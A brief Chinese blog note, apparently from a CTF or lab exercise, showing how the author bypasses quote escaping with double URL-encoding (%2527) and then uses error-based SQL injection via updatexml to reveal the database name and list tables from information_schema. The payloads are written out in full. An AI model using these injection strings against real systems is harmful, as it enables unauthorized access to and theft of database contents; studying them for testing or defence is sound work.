2021-07-31
输入’ 发现’被转义成’/所以用%2527来绕过
因为爆了个错误所以判断有报错注入所以构造报错语句:
%2527 and (updatexml(1,concat(0x7e,(database()),0x7e),1))
然后爆表:
%2527 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1).
原创
2021-07-31 21:24:55 ·
94 阅读 ·
0 评论